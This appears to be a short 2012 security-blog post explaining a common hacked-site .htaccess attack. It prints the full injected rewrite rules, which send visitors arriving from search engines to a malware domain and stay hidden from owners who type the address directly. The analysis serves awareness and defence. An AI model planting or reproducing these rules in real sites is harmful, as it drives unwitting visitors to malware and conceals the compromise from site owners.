[.htaccess] Redirecting users coming from search engines to Malware Sites

This is the most simple type of .htaccess attack, and the one we see more often. This is what gets added to the .htaccess file of a hacked site

Code:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://globalpoweringgatheringon.com/in.php?n=30 [R,L]

As you can see, it will check the referrer from anyone visiting the site and if the user came from a Google search (or yahoo or bing or any search engine), it will redirect the user to a page with malware (in this example http://globalpoweringgatheringon.com/in.php?n=30). Note that if you type the site directly in the address bar of your browser, nothing will happen. Why? It makes harder for the owner of the site to detect the attack, since they will probably type the site name, and not search for it on Google.http://globalpoweringgatheringon.com/in.php?n=30 is already effective site by Malwares.All traffic form site will redirect to the effective site. 

Penulis : Anon Cop ~ Blog is bassically for giving maximum knowledge of hacking to provide security.

Latest Article [.htaccess] Redirecting users coming from search engines to Malware Sites is published by Anon Cop on Thursday, 8 November 2012. i think this article will be helpfull if so dont forget to thanks in comments already have 0 Comments: in this post [.htaccess] Redirecting users coming from search engines to Malware Sites